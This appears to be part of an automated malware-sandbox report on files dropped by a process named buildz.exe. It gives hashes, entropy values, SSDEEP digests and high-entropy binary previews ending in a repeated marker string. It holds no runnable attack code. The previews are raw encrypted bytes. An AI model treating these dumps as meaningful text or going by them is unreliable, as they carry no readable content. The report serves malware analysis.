                        Preview:<?xml...(..].......A.......@.6.8.X..#.Hu.'/$.l.......H.......dr..s.@.p.u....{?G..W.e...(.x .C......o.}.....A]........%.....)...."..`N..5..7i.}z..........9g..o.}....f.....y....|p...:..J.._i%...M.&...O...n(.[NM,RK".....Q.e.7.QG......C.~.Q..Xrc8.dN..W....!.E,....c...d.u.......F..w.0....:......%......U.%.7..7..."..B..lqnFF..6.A\..N....Z. .D..(....Q._..d..0._;. ...q..<.V.gG...^../D..g."......O@(T1W\...5.Q..1..{..M......a.&.W....u..O....=NMD.-.k..V....;2{.......D..~..22yA.n..ne.A...U.$H...&Zz.H..8....X..._......id....%q......jFL.1/.o&.OE.Qa\BH..F.5h.]y.........,.qa.h...l{.@f..|Gd"D....{5..{...FBW.]..7$.#v.g..*....*Z.....Q$e.b....+.Z}.G35..Q.I.J..>7...g.....Q...})%..C#.\.9Lu.a^r.!+.d/"..R..a.q%.U..{..qS.].......0`.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):630
                        Entropy (8bit):7.663178149980873
                        Encrypted:false
                        SSDEEP:12:dO8krbFLdeHgYpcR0/S+mSO1VoNZ0nz5BVSTpUYy3+jWzVpd+gAhvz3n26Gcii9a:PkrSAYpScBBO1Vo+z5BUK+0ITfGbD
                        MD5:E4035CED09B7DFFDAED15FB2D69B4B73
                        SHA1:F70E03FC39D753B09ECCF03B82599B968C7DC57A
                        SHA-256:A6C5E94E9B194098EF9740FFB6DD7F89DDC705928C6B6DBA3009AD38EC99C842
                        SHA-512:914D52BD7BAB350869097714D81C92CB38BE04C97D120CB6B55E66C7C9441E159A054FAF9B064C7A218F5101E9ED7D1A4F4CC073AE918DE4E0FFFC2E526C91ED
                        Malicious:false
                        Preview:<?xml.'...e]....ju .ny.z...k2..L..n!...../cG.px..l.z.....&FV8~.....r...2.F.......b......... h....X....E.|.f%.!.........T.N...`.\.AC......`..J.!......*...z.o.s....h3..}Y.BqS..c.c;.IXnF..,.ww.[.(.r.a.T.giC'R..`....s..4.E.c....q..Ya..i...../.g.....*.6.(..d8E?^A..H......>n.b.+.t..'9.C....zt..]b.,..1... ;9b-..$0.-g...u..b........2.(..9..b.M.~..W.V,<||pVKgh`....t3.D.h.g.].+..$.`..a....b...g..........xv)@._.y...-.i...(i*.j....D.#..w.....D?$...U6W...M=,~...[Y-...]..o...k...,.....1H..E&".%5:}.<......f.ZH+..3....%.......EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):851
                        Entropy (8bit):7.722217540523407
                        Encrypted:false
                        SSDEEP:12:88jEoeaej9BuC0R/kmt7hmPKxQO0jVijDe6QQH/5725kW07njyK9t4SPOze26Gcq:PAFj9B90RcYbdcijDeTQH/5U+jDvxGbD
                        MD5:8B4742021750A28E68D2D69DF6D08526
                        SHA1:1CCEBDF59C0300EA052D4C4F26C23E857BFB8479
                        SHA-256:E6F4C2470354EA5703C0C42FF12E301C23BD5508BEEA7B2562240776C3900825
                        SHA-512:D210648FF98770526D10C5D35F686F6ECB34C1C7EB19C8880573B6A54F976B6E8C908635403415F542A596422E1B547EAE1EE597DB51CA35EF5E280EF93480A6
                        Malicious:false
                        Preview:<?xml.......K.*..3.yp.......IM#..E.5=....0..nj..:.... .-...7Ru.d..K@~\..\~..T2...!.h........6...?.'*....8.~.C".b..._.v%....,.>#.P/.>.]Q...k.3.........W@nR..C~.......fJp......g ...'...8}...]H.C.].E.%9A.U.2\.(.N....S..gD.5.?4u.Zi.....i....!./<...q..{....M....:0*R..J..JJ.....!.:.<..im...~RDfx.....z.[.D.(...........{....u..or.(...m...} ....:3...zr..t3.F=.C1l....(|. ....u....m._5..PN.....}..$.."..a7...E.y~...g.c.......=1.... !.'.U.#.,.1.z...qX8.E9<.dNS..4.L.HC}...0.c.DZ.. ...#7.i1.^yye<8..?v..h..c...3..[...L.i...$..2p......S.x...8..P...i..5q.....HY.:..|N[2.nc.A.B....1U....m....,.r,.6..g=4_....u.....F.........Q.....Q..ul....?...0....,~m.[.'U.p.kg..?0%^h...s`~q..x.k...Ku.%Uj).....fo..6.c&.lED..+`.a_.g\C.].I.$E.f"...>%.F^..y.....Vf.+.hEZ.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):6314
                        Entropy (8bit):7.970161505709254
                        Encrypted:false
                        SSDEEP:96:wFJPQAwqgmlKs9IjuVMorlhwOB15qE4anFbl2JgV5ID8Mwwslu076URtYM8dFA:wFJSqgrSI2r4w16sWKBMilu0mGN8LA
                        MD5:B7A07FCB4A93DB2723A03C9E0B274923
                        SHA1:DAC25C92D4D2DA2E2A256D261EE74D417410947B
                        SHA-256:10F02A3F8CABE3F2D5398E23D8DFF7CFF517C31C300955BA58A07C0E36C5A942
                        SHA-512:912E7C3BEC8E08D87AF54E5F5C373FB1FEF17228D9D21947B03FDFA397F9B008F0B23A206A9760311CD5DD010386BD4959707F6BE156FD0BA1C74315339DD46C
                        Malicious:false
                        Preview:<?xml...n......T....'-.....f!I"C.K.U.....TG.7...#.T....,..#O.[B..y.[{p.=.c.Zh..f3.*.$j.kJP....?s..b#./N."...Jv[l..5...D..-..O..n......jd..2..j.3..7.$..L.l.K..P.........3.r...{y]..P......5..b.....n.o8.p.V.h.}gB.WnC.."9........&*2o..!>.fxS.+......z.\}g>....j2..c....:PV.~.z.@....f..j|...5...yd:".q....H....a.....!d4......q...!......9..=E.Z.#E.}#.U=..s....RLL].Zm.X.HJ...q...th.'.y.Y[....@.se..j.!b..pP..PQ.......v.>.L.f.D..y./CN.....u.vK=.y.W..(..........`=f.^..r.L9.gg..\...CV\....J..c..n4N..m.S.."[.t(..-cNiIA.|.y:.O.....jV.g.g&..c^.LX.Uxjb./.N........d^...<.n...u.i..\.....-..`.@..I...3..N..7.'^.`]laop.s_....7.7.....uK.....H1......?*..6.....Ea...4F.."...\......3).U.g...kjCA..9.....\...w.y..A^.d...e)..~.S..f...@.u.\Nf.I._M..(.R..)..*.....:..#o....?..GJ-W".w.l;.o7..C....E......S!.+A.=..viX..8f.\....&..]U...K..3...p..*v;.....Y.R.w...........a..q..a.-.....yRxJ.cX.Y[.3.......~ .._....C...c....q..+.*..2.+.\C?.....+.'..z.Z....Ap(.BmJ.\|.X....Hu.P.[.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1029
                        Entropy (8bit):7.803587165007069
                        Encrypted:false
                        SSDEEP:24:slc35H5yKmBaItWdFM1kO95lKmV/TaJlkjee9DvFeXDaGbD:l5HJcaIsd9O9DHV/TF1eXmUD
                        MD5:032DA9C938F2EE17173DB877BFE8BDFD
                        SHA1:C2ED6DAC2C6282FF9226DABC7D78A23D88DAF980
                        SHA-256:66EB6287913A4DD38EDDADF38FC070274A96DBFD2596AC6438066F5B8219A9AD
                        SHA-512:E6F21D62F5BC1974B98FD4488BB0E4348EC73D3800B85D77134C8A6C2B97F0A38F5866FFB054642D36F82BB0C1969E0F7CAB69293FF83FCA308922172C31ED06
                        Malicious:false
                        Preview:<?xml.{...Up.`.=......S^.0.`-m._....f...5..Xh}%FV.1.F.W.MI.....U..#.]....f.....NF...MI..x.7...F........M.Jj..r...o....;..zf.. V.$}.......~.0.....)..[<..}...'.....'g.^...8..u&..}".. .kF..TNJ..h|.Y........Whj......4..j..w.k.iN8/..|c.K...f..N...E[t.C......ZjcY.....~P.V..>{..w.Z,.......;..^.m......$>td.USE......Pa\7.....Hh[@3...[.:.P.`...)8..}........m..........}..j...M....jN.r..5...z@.8.9|...(.......=m.._.(..4.@...|?..4.u.O."$Pam...,..ZI5.......-..........)...U (=lv..K.{.3...PS...P.+_R.O...5z..).KL...{:?.....j..t.[.f..4q....z....\B.....@<H..\...q...!5n...X....`^...........D.`Y.....u:9..U........a....n.eE....ba.x..K..S..{e..^G2..a`g2k.}h..G.A;..).m.(6.O..O..<.<2.....e.W.>.r.y|...v...k.s ..s...L.Z).N........d+.'..V..0..'7..W&SI..]./..`>.}.51$q....M2..h.-.$Ho.|.{VO...t9..Y...z..Dz.b...9........q..J.....Yh.s.w............;d..Ni....S....3..G.....@)^~..+.5..mJ...PH.T9.@&j...0.....d"EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1040
                        Entropy (8bit):7.760744631286387
                        Encrypted:false
                        SSDEEP:24:5LxiPshwE/H4GFFKJ4oRrtv+ncodIqWjYxa7oMv8um/pj36al0FTG8/XvpGbD:fs/s4+1uSdHWS0oEXmRbaJGQUD
                        MD5:044C95DEFF7E3ED72535328DE4549AF6
                        SHA1:7CE6794ED45BE9797C7E4DE132D19A02CD9FF6BB
                        SHA-256:7980A49BC55857086C63B972C8A1A4DCA4D84D3866E027D2F1B712E29A7903DC
                        SHA-512:C9F98D821A78254EFB40B2583CBE6D1EBF898EC4C1DEB4998970433917379D3A9D4A0EC05FBCFE73445C48F65262F5009391056A6FDE8A3C68B71E6E69E92E9A
                        Malicious:false
                        Preview:<?xmlG...M...A .M....=.|...A3......O.GA*.k.q....p*..q..D$.G... .];b.mDiW.z.l.Y.V...=.]c.p.....Qx^.d.3F..,.zD..]=.o.?..&.K.]j.m.....z) ...l].<|B.29....+.%).'......bv...j...n`...Y..S..AD...>.;.Xx6...sC1J..P....@.%....a7,...n.j..l.i....9.....p.|..d%G/.DL2....(i.Q.7n5^..u5.i.........z.......md.....m....jy....:......J..?tN.f..di@V.#2......l.v?M... B.m...k.....h...M..e..0\..v\.....m.q..:{.A.h.UQ4..........6g*m.f......d.].1E....?...J.:\.....,d.ID..+..~.E.+.H...3.b{.9.l.@...m..n@P..D1..........E>...u=\j...Ky.-T.\q.......1..)`..%......i..xY^......,.6..U......>Q...<3..&...h...?........FN.....i.Q..l.J.C..C.>)Q.*....u2F[C.....a.v..tQ...u..I.U..".o..B...q...ci.|.t.....:.+.S..7!37."UJ....|.0{W.t.Q|......+2.G.eP..N....j.m\..-]..q....z...W..g:I.._..i..Y........V...^...z..ugFFe.9.e....`....7.8F....lo....XG]Pl</.nNH......EB..Q..+9..(....E...f....O..a.i,.Ah$|.{.../.$.....~.\<.'Y...Du.j/.E....0D..|.0.*.........3.|.cX)FQ...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPM
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1415
                        Entropy (8bit):7.861149008232125
                        Encrypted:false
                        SSDEEP:24:4dELlWq3NSyQ38tvbB/kD9dflMPr5Xh6uCnGZlFmnLXwGbD:4d/qdk8dbB/kDPfiDVbCnuAXwUD
                        MD5:5B0F797A30A82859948E8CB58A9A3D26
                        SHA1:F19C02F3CB9D7456B6F767A15D7C933FE94E7221
                        SHA-256:4CCA73328532CA48B49CD0A4EA66F1D559EEB1407E810C29710314D3D7C7C0BC
                        SHA-512:FE83200A83A3DEFF4B6304F15F9719817C8E312A16D8DBA4BD2ED98F933151BCA7B1FD7FCF5ACFD442394A7E7D56DE2D84BF89708AC04069DDA13E356195ADC6
                        Malicious:false
                        Preview:<?xml.T..tu..0}P7...n.QVw.s.....K........F..e..T=Z....._ar......+k..C...2.z+.1.8...V+X.....41.'"o't....G...YW.r....{...,s.A{3...6@.....P.L.....YP....(.....G..6..rL....Wm..]. .d...lae...HD.......H...Gl........-S.f...B.....0.+2..Q..@..v.. ..^LP...Y.?.x....:v.......l....Kn.....Zs..Q.......;.t......$.O...[.{P...&.Q.w(..I)J...+ ..#T..A..+A)._.3....i:...ha.[..YID...#.,...te.....t...aB2o..c...O..P..y..$.S2...:A..h.../..b]....K..^.J.e..o...Ek..sT.),B`z.,(.>@.4)..&I>...Cz.....tx.-.:(*i.....=.z.....N.@..J.G.3B.G...x...#.]b.Ty..j1.....c1J.]a..lKG`..ok.D.:.)....f..d28..w]..;..bT.6.."......q..+..|..q.5...)...@..j.%.+..0"....r63.AsAo._u..1D.......;....`....s.....JJ5...8.c.1..@#m.O.p..orl.T];......._6=..$v..goU..~...Z..a..t.pu.+.H..m.G....A;|`.... ..<|..HC..O.\>..i...5U...N...=.&.Y.B.v....T.2......y........t?.Uq;3tq...".I.[=......lY...h.!.'u......W)@_..>%c.....$U.R./}W.M..mq.)N^ccq.8..).X.t;5.)m.y.r..'.../..Zj:M.....>r...K.v..n=xa...t5....@.>VL.Z.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1073
                        Entropy (8bit):7.81258594426086
                        Encrypted:false
                        SSDEEP:24:6Apkar48wW25LxDabeMqBL9U9A+KLWo7IB3hAUjt0xaGbD:6Apk648327DdMqBLwA+PhBRuxaUD
                        MD5:7BCAF54636FDA98D017C0F15A5170133
                        SHA1:DDAF5649E595AE9496C52D6C547779930F65EC3F
                        SHA-256:C92EE7DFE55ADEBFEF0F6033BF5F42924C684CA67E05D5DE2D0DFC9930066A1A
                        SHA-512:8D820170F38E28EF4AC63DA275C6A3E86CFC4B94C4842B874339E45D458E183B6509FC2B6E0469C4BFA884683B41B3125CBC453E0258B5C29845476F9E6A332E
                        Malicious:false
                        Preview:<?xml.....Il....T>.(.....7E.d^.B..j.U.........O.[....-.b}la.>.....P.}.rQ...8`O..._c....._S......n.0`\.....2..u.... ..8....6P......?.X....s..:....B..;.&d.?Go..u.k[.m5....[..N.....[.lr..f`..[..r.j...4....8.........~R......!...i.|.b.c........K]....+|.u.+.\....u[rY..8.*.S.._\btY%........q.mS.........?._.....).}g.tBL!U.c$.o..Y.{.{0d...U..n...Np5.7.6.i.%..0...|..I...Ab.p......s....I...G../...d....0.+.G....:.......b....V.....'.F.Mg.._...6.5...R.......)..b..SZ...D...de.u.O..y...M...w...0K..iT_3.B....r..@.:..........;.|.P...>..%...n#.m..&CC^...Qq.N.....4.E...X.h..@.......\X..1U..qL(...z..N1..m.L.|..._._.^...O......0.m....[G.....7..z.G... ..j~X,..$N.*..+....1............K.2...lN...K...=..3.=(Rz..ar5..!.s.<H.e..;.2.B..b..<..\...,.[I.q!.;.C]1.....f...2w......K.#?o......Q1.o.x.]Ggj[.X.0..Q..M..5'.7...V..{.....m.../Lm8...)....|.2......D.....<./..yM.......u...k........W...y."....U.B.N...gN.tt......?........c-..M+.h..g?...Ugi\..o.SH|.......R..EdRvS
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1154
                        Entropy (8bit):7.825294681637825
                        Encrypted:false
                        SSDEEP:24:WmPjKJP0LHW5HVHF1kZTZp89UYEPKdgKHmCHzyuOZGbD:lPk0LHW5HVlCZWUYESdzyzUD
                        MD5:833827CBBA831C5439D997D8B80FA76F
                        SHA1:B45010C015E65EF683A830F80377E35359EA9C02
                        SHA-256:27AA503D0442885446C7F1A74DB7ED2B5A3F81B6BD331D805C62E46156DF1166
                        SHA-512:99B4AB2EC3BFC339C37A931D4C5068B2EA145FE88E406CC392770D5B887A5F2DC980AE86FC1F7B26DC80B20A137A52D4C9D82274528D753A32B3C875A9817348
                        Malicious:false
                        Preview:<?xml....?[..(.L...#}.. .P...t.. .Rzj...XQ.9...0p.H.y.l..._Z{.......Ng....tV...\.../...6o.f.}r..g......f.)...h.....h.X.........|].5...==.%.q..w..a}.6.p..A$.9G. ...d...&.pO...%.}..j.C...;.=...h:.6[...)....Dj.`.T.U...5.:..U...../#...V..#....V}ejF......f.t.8R........4..o..,A-.....'!.*.......@.N........P..B(.p...F.5..2n.T.?.@B?.'..n...`...`.. .3 .Z.........WWw[.\..d.WE...\:..."{..ypx.!...K..sxHd..A..I.K.K.....xY..l...?c.g...0..;.......Q...*.K=....&.N..0..I......E.*..>.>..g.."`.2.....Z\...Bk.........p...`.Xl.`.l...).Va.=....j..........K.. .FZ\+...6ap..$.a.wD..:...qLT.?....J`ls.n..V7....Jz.........S..m...w.....7`(.4....;..:=..6..oM)....Q.....V|..5..4.].....]~d.C$.L.M...2..h.=Hg...H(..w6...s.i...c.3.\..J.J..I#.n.P......v..e........s.qR..S .n..(.2.c..p..Y..d..P.....2c.....V.*...%.....}.j.....8...J....8....A>.......Z.....5.........yA.p.y...Q^wEV?..z"...{...s.T[.KN.B..........."..=...%k|...!".Si_.9R.25..;*].....\....S&.l2J.G..O*....I..~..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1902
                        Entropy (8bit):7.884603405137441
                        Encrypted:false
                        SSDEEP:48:RzQl9OANu4w4iEZ9ycthPocy/LAZcDhofUD:Gl9RNuqiE98j/d1ofA
                        MD5:510015904611940BB0FF2A8B0182EBB2
                        SHA1:631C41CD4F2813F0EA97901E5F30525C43401118
                        SHA-256:4259CB78DDA518D8A1895F88312BBC4E95306E449CBC35FE144D956B2450C3E0
                        SHA-512:289E56B10D68693CFC5765FEA84959069EBA23674E01A349657D9175279A0EC5837F8982D34A604E36FD4EC4E260A404BDACA9140F4C8AF4A8F211244CF510B4
                        Malicious:false
                        Preview:<?xml.I.U.....}......W26{...m.....F..DC.lc.(.").%D.k....Z.....bl...r...<.V.\....%A.4..P.X..H....#.i........#.;..b,.7K..6l.C..=..Z<.6..Y..l..{.\.....[>Z...!...C...J.M...o.(LF.N.....?.3?^..h<id...z.{....Ii.o....!..>.....$v.f......$.i....[.}.?B'.62...m..%<..UV.3.....=.kj.........E.~a.e,.`[....\.I...8...i..3....K9.t7hiz..f.A.qS.F....(.V..O.....3./......SL.2s.N.c......bE.K._F..h.E....5.....Q..z.....N7....tk.j>YO..gT..xX..*h...>c. .. E...^...].f.#...k..."..j.,.J*g..$t`..D.jS..v..-.....B..'..B...Pb..YA.$.... .....A.t...H.......<...A..s.X9.l9F.C...#.p.N...-........V.`..%i2./.W~P...".>.....d....v4..5.......N....s2.nu%...P....P..yL.E..........L.%.8....3.....Q.......|@..a...!..o...@...fo.~.,i.1......A...f.h...V......m.-)i=.....'.........o.[..m..5)._../..V...^...a......N.{ac.N0.......C...h..p7..'9M.....f..m.r <zG...,sr.'.....d.EybJj.V.....v....I~.N.....a....{P..?..d7p.....F.(.....2[FNO31)<&....8_N$5e.xf.%(..'...T9X..8.l.=qe..3.S......./.Rp.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):712
                        Entropy (8bit):7.6942455060634805
                        Encrypted:false
                        SSDEEP:12:jMpyALbaPBltRgM2yBab6AY+baWlGYzzILczGIiv+oeVhfO4WF26Gcii9a:2nXaXfab2WlGgcgriWy48GbD
                        MD5:3EC772900E9F532497353C88210CB039
                        SHA1:EC395527F94B25A406BE22BADF3091090E520CA7
                        SHA-256:0494F9F780EB6129176412220A966A9322C1EF7652BBF99F0233474F3ED89B27
                        SHA-512:9B9EA1FBFF8D790D12C3E7DEB9895F1A5E29F1E17E485D33E726A470D9282C9675B25FF6B1B3CFC9DC894764609C7C456AD006E91FC57F4052A24A2441CA4BB7
                        Malicious:false
                        Preview:<?xml.A!H,..8.#s..2n.h..t......Q*.MH...]6rx..\U../....;...+J.6.,...r....`......2S4....m..L....?.V..`*e....2.. ........>.;U j../..F..4..1{Q.`l..Qb...B..R..:M.......... L...<U...ozB..D*..p....'t[...LUp.F.0*.R..+e.E....~....C..6.>_!}........i...}.W. _....op....Y...8...P.x.*..*.T.b....`*@.'.../.....O.s..(.."Pa.q.,.x`..d..]...w.4.p.b..3..KrP.i)..:/...F......=.$.0.t.?..%..2@:p.0.R.H.bIH....4.w..$...b.v_K..O.....T..JY.\...G.h.j.o7&.TYE.%.ZE..&W...T.Y%..g^.#.....4.d..<z..zQk.^.|..!vN.vX.,.u.^..N...6....#..lh...YSQUL.L.:.Z-..=,N..,G.[...:.....0..X......y...m..Y,...Q.R.h..."..B@.)[.....@.6.x...K..M .=d.;..'V..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1707
                        Entropy (8bit):7.886630619200716
                        Encrypted:false
                        SSDEEP:48:IxD4LTXA+j2sk/jSzkzfF1UEsrNlb3mGcMBUD:IxgTXA5skWg/fKLb3cMBA
                        MD5:5ED5282AB3B9EB2E3BBD33110D5E85A0
                        SHA1:92AF9545643028DF72754C4A642B4211BBC26629
                        SHA-256:03B9D7B454447D4F6666377877D300B190B4491AF144B8ED627DD08F36DDC713
                        SHA-512:F221D521642FCEFA37C3F9CB952EBBC4183BBA3AC09C17D513DF2A7C2C7BFCD8F7D6929B4F20523A2DA0F2A62DA664DE360233E913663E1DA63B418B3B17D440
                        Malicious:false
                        Preview:<?xml.\.&..<.?.(-..s.x..-.7..._..Q.<....9.."..0V.L.8&..mg.C.L.).]M...........'...$..lDv...\..<..D.O..........J....*.p...#.j.r....e....}-..$t.9.....b....\.>.UJ..N.C7`LPy9..x...n..< .N...N..]..n....J4.O...A....w.n...b..."...S..3...}.75..d....0..h...m~J.,#{.....V.e...px.!.$.............hq.k{..i...P.K9~'i..b.v.\...@..R{_.!...&.....N./...]V.&..!.|...|O...a....A..a........n.}.*..j....Vf.Z.:;&Y.9...b6.....8)b.].v....".m..b..g...zHd..'.`.;....,..m...$..L.....N{.2-.....[.-Sfeb...4......%...o...i.Q9.K...e....W}.....nd..=.......7&.9..........f..&....|.....;*....#......8.H..f>...../..N../..~.F./...t...y..=4..,.{.W.!.t..)@.1g..;.......`...{83.HF..H.c......|....a3"..".x.31.....I..d......1s_...e.X* W..(.8.MWZ=...(Q.fc.=.z&.N...M...gv..........%8.PE.c.......[.#ypr..#.....|.I/e....e.F.....2R]..~.).s..s.$A..w....I..[KB-..{.....~.....n..q.<..'E....{K&..Z.L5MeVQ.u......!.Ew....U.aL.f...w....(.v.(_.x:.)....].].G.....n...4=....E...9...3.%.. ...$=.@d.TQ.El...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2111
                        Entropy (8bit):7.896574346532931
                        Encrypted:false
                        SSDEEP:48:GNQPaAX+fnUbS8FRc3Om6DSQMTkV2InpQeU7jPwUD:GSnSnUbSibmaSKAXwA
                        MD5:24B694674981ADEED6CB22AFD5397C94
                        SHA1:D7C190A2B6E577744EC86E9348897AE4BEC04DA1
                        SHA-256:684CAE1425C8D744AEDF77E31F464FAF6B554F6D9D853B7E8204BC3C0E388F41
                        SHA-512:E01C256B2F06E1FA8A520D0E397DF788875230B5B1376DF6CA0A908F18735AD8F988A1B1007428ED53C17EFEC9A4906CC4AF792F8AAA1F74D831E6F984B301D5
                        Malicious:false
                        Preview:<?xmlf....r...Q.fn.x.t..h...|....sEy..R.c..x.8....7#.[.76....h..;.jc.xnjp..80..<..^..F.z4c.../.....\.RS...?nS...y$..a...8...0..n..0d.....:+..J..6.9..l.a....qt]}g8._h......L2.........&.1.8:.K..J...WW.x..P.QQ._..|.x.0..g.H...q] .......O.G.E......./|r1.K..W.....Cy*Q=q..0.._.p..y....k)W.c...w.h-..i>....l...Q..mTk~'..e......U:wK..;....eR..I(M.K.1.%...U.+A.J....L).A.....`.....g!:...-..t$.SQ..3...e...A..u...!...?@..."vP.Yz.H..M.[...hh.T}.x......_Z..I...%*.s.C.n.y..Q...?j.0X........B.H....".A.Cv|7."~.....,......>.'.O..x@.H......#Mcm8.":..!..\2....b..x......V.|Y."/........Gp.....<....(.O...$.8..+..}..9..v.....6[.$d.x..2F...}.x. ......ZZ8...N..<..l.{..3.....l.b...4t....Q......L...)..w>.....=mW]\.VD.Z.%(5..._.4V.*..v...../....^.q.Y.\.l..`8:.v...PK.%"...CQ..Tm.DPe8....">th..."..E.<. ...vF@."..z.W...92...WY...|.&.Q.......j.).hep...2.D3.s...~>.m.p..~Ow.K.{@......l\&.>...t.J....7.Guq..h.w......j..%@V.._..+.[...a.\);.3y....r......\..Y.V.......0;...b.@.$...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1732
                        Entropy (8bit):7.87153743667885
                        Encrypted:false
                        SSDEEP:48:8lMmFCHGalpwiMmePFrWibjE4u6pxZdjIJgXz5UD:X2CmewkqF5X5dkYFA
                        MD5:6F99876F7A447E7BD78EE9DDA347E844
                        SHA1:C867085DD824131833F09A5F7B4F808BAE1C3FE6
                        SHA-256:DCF4FBEB6652F6BF1EFFA29C59D4C2F84A90CFF01CF16D7BF9D57A575A0BB953
                        SHA-512:16A43B0519C7946C98A77FDB9B9239A5A931303B691AC675A7F69AD0BC7B46173B32AD44821843ACA24831462461A95426B9E9AFBFB41177EFB37D91A742EEEF
                        Malicious:false
                        Preview:<?xmlx.z.`..gb...._......q.X-.&`|.Hl.....b.(...$.N..[.."$r.,..u...[.U.g..).-...J...r}..&T.....J.......YZ.R....4..k.s.xu.<...N.2G<w1a.BHY......Y..bm..*>.wE..A....t..;...8.R4.g~8<.....S.6c..0...!......f.z.7.ssC...C... ~.[r...1..d.`..$.*.d.N...],.C.bK.....4l.W0...E.....z..^..X....|.n....w{...b..{..Q...]...P.'fL.....S...m..8...A7Yhx..u...EJ..,]...=.5....J.YS?...%n..^...6...).,...[.O..k.#C.).........=.xy.....<.b.=ZF%S...l...#.....M.d......t.x.O.....'...e.6.F..wa.&*h....O.%[_.c._.:d..s..t..fd..._.U..E....sT&.....2.r.p..(.H....*.&m..Z..O..2........g...@.6.K.~Vj.u.......%l3Y`3.LR$..e.? e..h...-{..Q;R.K..Y..7?_.'...x..>......4.oH...%.H.w...a..D..T.8..m.}=.....r8b.\...3./.HQ(.TI...ew.|.pg...g.....l....h . fa>........'+..4u.......*...`....?..LD.....\,v.2.3.r...J.zv...|}..5N.....%...`....l1 .4.N6u....|........[..k.V.V..;.x....N.G.k......]Dz..3V...[.....V[GR......bF.[....9a..P'i..j{..J.L.~..N.G..4}:...V..g...X....X~.,].....gl....D.....D....i...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):935
                        Entropy (8bit):7.745074275142555
                        Encrypted:false
                        SSDEEP:24:PmttnOyEvWBLiX7Ggvtzqi3gUU+yHD2GbD:PonJEGeXKgvAiQU0KUD
                        MD5:38B757AA27AB8B3FE245F41E83B6789E
                        SHA1:53CA932B2202CDDEADE7406A7038FA1F6A02BAD7
                        SHA-256:4A9FE949F7C4141BEA9E653ED448EBA722C489DC569C7768C8F7C27D368DD9A2
                        SHA-512:7D8C0D6B6362241533700CD660B9401C936427B76A6F16F5B373FC47150DE77DE58EC140423F4102EA2034CBB62913A419ECF28AA8BD2BD96CF2FF6ACE1B02B1
                        Malicious:false
                        Preview:<?xml.n%l..WI.y....1*eaF............+R.9%8}.R.eb.3Re'.\..k>..K9.A4..D......Z..... 0....q...6...;.Ur.G.>8.H..}3..9.....j..jfW...*.'.c.....k3.E..{..i..F....-.I......C..........W{L..~.0.2..v...A+j..lm9...^H.7.....S.<vh........c.W.U4zF.....1.>.i..F..n...-.v.a}..]C.;.xU|....id-.....`K6+f;.....D.d.7"]..9x.xJ .P..>.....!..=........o_T_.'u.E.KCp..}*R0.(.;.......T......F).X.<....K.hp....4.$I...].....@..>......3..e(.fNF....#.V....;......^6.U...9.+........K..S....!..|.....0...t.O...+..MSd.K]T.....;sA....NAs..z..._..<e._KD...{R.D.9._.@.&...b.M...lX..*.vp..yN.~..Dy.XUN..E..E..#...(..R.wo..SX...%.[......z.x\,MS|.{..lT{.G....y.'.u/.!sO.I.......l....;...P({.*.....$.%....:...X.`.0}.d..|;I..;t.S..C...6...c4C...6..*......#'.E[.}w.'..c...N.z..y.....q..E&k7.2:$....].]...Y......R.[..&,.u5..}$.%..(..L..N.#)... ..vh?.(&V.'r.H......F.BEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):980
                        Entropy (8bit):7.768440782373227
                        Encrypted:false
                        SSDEEP:12:KTHYZ2uRV6ab56g/peVOgSHRJVfK/yMog8jnQSi3C+Ilw4AR3pY+Y/uKgWsVF2Sy:htCzSxPKlogflYVA7h4NviGbD
                        MD5:A2D1AA0C0FDD1047E44934FBE9D2F739
                        SHA1:90BAC6A22CC97E7EE934B93961EA67DA09ABDCA9
                        SHA-256:62840410AAB84D048DDE7C250BE9B79CC2F0807460571B6A273E06BCDB5CD1EC
                        SHA-512:B460992B2C1CB06F9E5C36356EA3340EEE0ADE537BCF0BAEB10605EDEF5816C2E96747FA0E2422BE7E930474575302FA2CCEF7D34F069A353D84B263D77B9FD4
                        Malicious:false
